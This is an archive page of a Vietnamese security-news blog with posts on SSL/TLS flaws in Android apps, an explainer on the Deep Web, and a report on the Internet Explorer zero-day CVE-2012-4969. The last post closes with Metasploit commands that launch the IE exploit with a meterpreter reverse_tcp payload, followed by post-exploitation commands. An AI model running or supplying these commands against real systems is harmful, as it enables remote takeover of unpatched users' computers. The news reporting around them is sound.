Category Archives: News

[News] – Điểm yếu trong việc áp dụng giao thức bảo mật SSL trên Android

Phương thức thông dụng nhất để bảo vệ luồng dữ liệu truyền tải qua mạng trên nền tảng Android thường là SSL hay TLS ( Secure Sockets Layer và Transport Layer Security ). Hiện có hàng ngàn ứng dụng trên sàn giao dịch ứng dụng Google Play đang áp dụng phương thức này 

Một nhóm các nhà nghiên cứu từ các trường đại học về kĩ nghệ khoa học hàng đầu của Hoa Kỳ đã có một nghiên cứu về việc các ứng dụng Android hiện nay chứa hàng loạt sai lầm đáng ngại trong cách ứng dụng SSL/TLS vào việc bảo mật dữ liệu truyền tải qua mạng, điều này dẫn tới khả năng xảy ra các cuộc tấn công kiểu Man-in-the-Middle -1- sẽ khiến các thông tin, dữ liệu nhạy cảm của người dùng như tài khoản giao dịch ngân hàng, thông tin cá nhân, tài liệu mật, bị đánh cắp khi người dùng sử dụng các ứng dụng Android tưởng chừng an toàn này 

Nhóm nghiên cứu đã thử nghiệm trên 100 ứng dụng được lựa chọn từ Android market, và họ đã xác định được 41 ứng dụng trong số đó có khả năng bị tấn công đánh cắp thông tin ( tỷ lệ 41% ). Các nhà nghiên cứu đã tạo ra một công cụ tấn công thử nghiệm gọi là MalloDroid, được thiết kế chuyên biệt để khai thác các lỗi về ứng dụng sai cách SSL/TLS trong các ứng dụng android, giúp chỉ ra các ứng dụng này hiện đang khiến người dùng gặp nguy cơ bị đánh cắp dữ liệu mật như thế nào 

Họ đã thành công trong việc thu thập các dữ liệu mật của người dùng các ứng dụng bị lỗi áp dụng sai SSL/TLS như Tài khoản ngân hàng, tài khoản các dịch vụ online như Facebook, Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, tài khoản truy cập các máy chủ quan trọng, các địa chỉ email chứa thông tin quan trọng… 
Nghiên cứu cũng cho thấy việc hoàn toàn có thể chèn và kích hoạt mã độc từ xa vào các ứng dụng android bị lập trình sai dẫn tới áp dụng sai giao thức SSL/TLS. Các tác giả đã cung cấp rộng rãi nghiên cứu này với tên “Why Eve and Mallory Love Android: An Analysis of Android (In)Security“. 

Điều quan trọng cần phải nắm là: đây là vấn đề cực kỳ nghiêm trọng, các lập trình viên với trách nhiệm của mình phải tuân thủ đúng các chỉ dẫn khi áp dụng giao thức SSL/TLS để tránh tạo các lỗ hổng để hacker khai thác và đánh cắp thông tin mật của người dùng. Đồi với những ai còn đang tự hỏi SSL là gì thì vui lòng tham khảo tài liệu “Beginner Guide to SSL Certificates”.

(Theo The Hacker News)

Giải thích thuật ngữ: 
Phương thức tấn công Man-in-the-Middle: thường hay được viết tắt là MITM, là kiểu tấn công mà tin tặc tìm cách đứng chặn ngay giữa hai máy tính đang truyền tải dữ liệu để lấy cắp thông tin đang truyền tải. Cách vốn hữu hiệu nhất để ngăn MITM là áp dụng SSL đúng cách, lúc này tin tặc có đánh cắp được tất cả các gói tin trung chuyển qua internet thì cũng không có cách gì giải mã được do nó đã bị mã hóa.

Lời khuyên cá nhân: 
Các lỗi áp dụng sai giao thức SSL/TLS này thực sự không mới, bản thân nền tảng android cũng không yêu cầu nghiêm ngặt trong việc phải áp dụng SSL/TLS một cách đúng đắn, điều này làm Android tỏ ra thua kém khi so sánh với nền tảng iOS. 
Đây là lúc cần cảnh báo người dùng, để an toàn, nên tránh sử dụng internet cho các công việc quan trọng như chuyển khoản ngân hàng tại các điểm truy cập internet công cộng. Sẽ an toàn hơn nếu bạn sử dụng kết nối Cellgular ví dụ như 4G LTE, 3G, EDGE, GPRS… thay vì kết nối vào các mạng wifi công cộng.

Advertisements

Deep Web là gì !?!?

Deep Web (tạm dịch là Web Ẩn) là các nguồn dữ liệu, thông tin dạng Web trên Internet nhưng không thể tìm thấy trên các máy tìm kiếm thông thường hiện nay như Google, Bing…

Có rất nhiều nghiên cứu cho thấy, các máy tìm kiếm hiện nay chỉ lập được chỉ mục (indexing) cho một phần rất nhỏ của tất cả các nội dung web hiện có trên Internet, còn một phần rất lớn của Internet hoàn toàn không được biết đến bởi hầu hết người dùng internet.

Bạn sẽ nghĩ gì nếu bạn được cho biết rằng ngầm bên dưới của Internet là cả một thế giới nội dung rộng lớn gấp nhiều lần hơn thế giới World Wide Web mà chúng ta có thể tiếp cận hiện nay? Chúng tôi cho rằng bạn sẽ cảm thấy thực sự sốc. Các chuyên gia ước tính rằng các Web Ẩn mà các máy tìm kiếm hiện nay không thể chạm tới, chứa lượng nội dung nhiều gấp 500 lần so với World Wide Web.

Để có thể giải thích đơn giản và dễ hiểu hơn về khái niệm Web Ẩn, chuyên gia về Web Ẩn Mike Bergman, sáng lập viên của công ty BrightPlanet đã đưa ra một hình ảnh so sánh. Các dữ liệu có thể truy cập được của Internet hiện nay thông qua cách tìm kiếm trên các máy tìm kiếm (Google, Bing…) giống như bề mặt của đại dương (xem hình minh họa đầu bài), rất nhiều thứ có giá trị có thể được tìm thấy trên bề mặt của đại dương internet, thế nhưng những mỏ dữ liệu, thông tin có kích thước lớn hơn nhiều, giá trị hơn nhiều lại nằm sâu, thậm chí rất sâu dưới bề mặt yên ả của internet, các dữ liệu này thường bị bỏ lỡ bởi các máy tìm kiếm không thể với tới chúng.

Thông thường các máy tìm kiếm sẽ lục lọi trên Internet để thu thập các dữ liệu bằng một dạng phần mềm gọi là “Crawler” (chương trình thu thập thông tin). Công nghệ này hoàn toàn không hiệu quả trong việc lục tìm các nguồn dữ liệu ẩn trên Internet (Web Ẩn), chúng ta có thể phân các dạng Web Ẩn thành các loại sau:

  • Dữ liệu web động: các trang web động có nội dung được sinh ra dựa vào các yêu cầu truy vấn nội dung đặc biệt hoặc truy cập thông qua các biểu mẫu truy vấn nội dụng.
  • Các nội dung không được tạo liên kết hyperlink: các trang nội dung web không được liên kết tới từ bất kỳ trang web nào và bản thân nó cũng không có liên kết tham chiếu nào đến trang web khác. Giống như việc bạn đưa lên internet một tờ giấy A4 chỉ chứa nội dung mà không hề có một cái link nào hết cả vậy.
  • Các trang web phải xác thực truy cập: các trang web yêu cầu muốn truy cập nội dung của nó thì thực hiện việc đăng ký và đăng nhập.
  • Các trang web có nội dung thay đổi theo ngữ cảnh: các trang web này hiển thị nội dung thay đổi tùy thuộc vào một số điều kiện tác động, ví dụ như người dùng từ các dải IP của châu Á truy cập vào thì sẽ được xem nội dung phù hợp cho khu vực châu Á.
  • Các nội dung web bị giới hạn truy cập: một số trang web giới hạn việc truy cập tới các nội dung của nó bằng một số phương pháp kỹ thuật như file Robots.txt, CAPTCHAs hoặc tham số HTTP headers để ngăn cấm các máy tìm kiếm truy cập nội dung cua nó, cũng như tạo phiên bản cache nội dụng.
  • Nội dung sinh từ script hoặc Flash, Ajax: một số trang web chỉ có thể truy cập thông qua một liên kết được sinh ra bởi một đoạn mã JavaScript (mà HVA là một ví dụ trực tiếp), hoặc nội dung được nhúng bên trong Flash hoặc chỉ có thể được tải về thông qua Ajax.
  • Nội dung phi HTML hoặc text: tức là các nội dung là text (văn bản) nhưng được hiển thị bên trong một tấm hình, video hoặc một số định dạng file mà các máy tìm kiếm không thể đọc được.
  • Nội dung văn bản chỉ có thể truy cập thông qua giao thức Gopher hoặc các file được lưu trữ trên các máy chủ FTP thì không được lập chỉ mục bởi hầu hết các máy tìm kiếm hiện nay: các máy tìm kiếm thông dụng như Google mặc nhiên không lập chỉ mục cho các trang không dùng giao thức HTTP hoặc HTTPS

Thế giới Web Ẩn song song này còn rộng lớn hơn nữa với rất nhiều nguồn thông tin, dữ liệu đa dạng thuộc các hệ thống mạng (có đấu nối với internet) của các doanh nghiệp, các chính phủ và cả của các tổ chức tội phạm mạng (như các nguồn dữ liệu bị đánh cắp và công bố bởi Anonymous, LulzSec…).

Trong trí tưởng tượng của nhiều người, khái niệm Web Ẩn thường đi kèm với ý tưởng về các nguồn dữ liệu bị đánh cắp, các nguồn dữ liệu bí mật thuộc các hệ thống bí ẩn không thể truy cập được. Dĩ nhiên, điều này thực sự chỉ là một sự hiểu biết sai lầm về Web Ẩn, các nội dung này vẫn có thể truy cập được theo một cách nào đó và trong một giới hạn nào đó, tuy nhiên ta sẽ chắc chắn rất khó để tìm thấy chúng bằng cách lục lọi trên một máy tìm kiếm phổ thông nào đó. Web Ẩn chính là giới hạn kỹ thuật mà các máy tìm kiếm hiện nay đang cố vượt qua.

(Theo TheHackerNews)

[News] – Khai thác thành công lỗi Zero-day mới của Internet Explorer

Đã có mã khai thác thành công lỗi Zero-day Internet Explorer, nguy cơ bị cài đặt malware từ xa (CVE 2012-4969 )

Microsoft có thông cáo xác nhận chính thức về lỗi Zero-day (CVE 2012-4969) trong Internet Explorer. Hiện đã có 4 mã khai thác thành công lỗi này đang được truyền tay trên internet. Microsoft sẽ cung cấp khẩn cấp một bản vá tạm thời để sửa lỗi nghiêm trọng này.

Chuyên gia bảo mật Eric Romang đã xác định được mã khai thác lỗi Internet Explorer CVE 2012-4969 này được đặt tại một server của nhóm hacker “Nitro” – nhóm vốn được cho rằng là tác giả của mã khai thác nhằm vào lỗi Zero-day của Java vào tháng trước. Công ty bảo mật Rapid7 khuyến cáo người dùng nên chuyển qua sử dụng trình duyệt khác thay thế IE.

Lỗi 0-day trong IE lần này là lỗi “use-after-free memory corruption” một dạng lỗi tương tự với dạng lỗi “buffer overflow”, lỗi này khiến cho máy tính cài đặt phiên bản IE bị lỗi dễ dàng bị hacker cài đặt các malware, virus, trojan từ xa. Mã khai thác đầu tiên được tìm thấy trong trojan PoisonIvy, một mã khai thác khác được tìm thấy trong trojan PlugX, cả 2 trojan này đều được ngụy trang dưới dạng một tập tin Flash Movie ( .swf ) bị thỏa hiệp.

Kiểu tấn công này thường bắt đầu bằng việc nạn nhân nhận được một email giả mạo hoặc một lời mời click vào một đường link không an toàn. Các chuyên gia an ninh mạng khuyến cáo rằng các trang web lớn hiện có đặt các quảng cáo trên website của họ có thể trở thành mồi ngon cho hacker, nếu như các máy chủ đặt các quảng cáo ( vốn độc lập với máy chủ chứa website ) bị hack. Qua đó hacker có thể dùng các website lớn để thực hiện việc tấn công diện rộng đối với những người dùng truy cập các website lớn đó.

Trong một diễn biến khác, chính phủ Đức đã khuyến cáo các công dân Đức rằng họ nên thay Internet Explorer bằng một trình duyệt khác như Firefox, Chrome, Opera… . Microsoft thì khuyến cáo người dùng nên tắt chức năng ActiveX controls trên IE hoặc sử dụng Enhanced Mitigation Experience Toolkit cho đến khi họ cung cấp bản vá cho lỗi này.

Công cụ khai thác lỗi huyền thoại Metasploit cũng đã cập nhật mã khai thác này với một thông báo: “Module khai thác mới này chứa mã khai thác nhắm vào lỗi 0-day mới của Microsoft Internet Explorer. Khi IE render một trang HTML, đối tượng CMshtmlEd đã bị xóa bỏ trong quá trình render, nhưng vùng nhớ của đối tượng này lại bị sử dụng lại một lần nữa bởi hàm CMshtmlEd::Exec(), điều này dẫn tới lỗi use-after-free ( gọi vùng nhớ sau khi vùng nhớ đã được làm trống ). Vui lòng ghi nhận rằng lỗi này đã được khai thác từ ngày 14 tháng 09 năm 2012 và cho đến hiện giờ vẫn chưa có bản vá cho lỗi này” .

Tải về module khai thác này tại đây.

Cách sử dụng:

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

(theo TheHackerNews)

%d bloggers like this: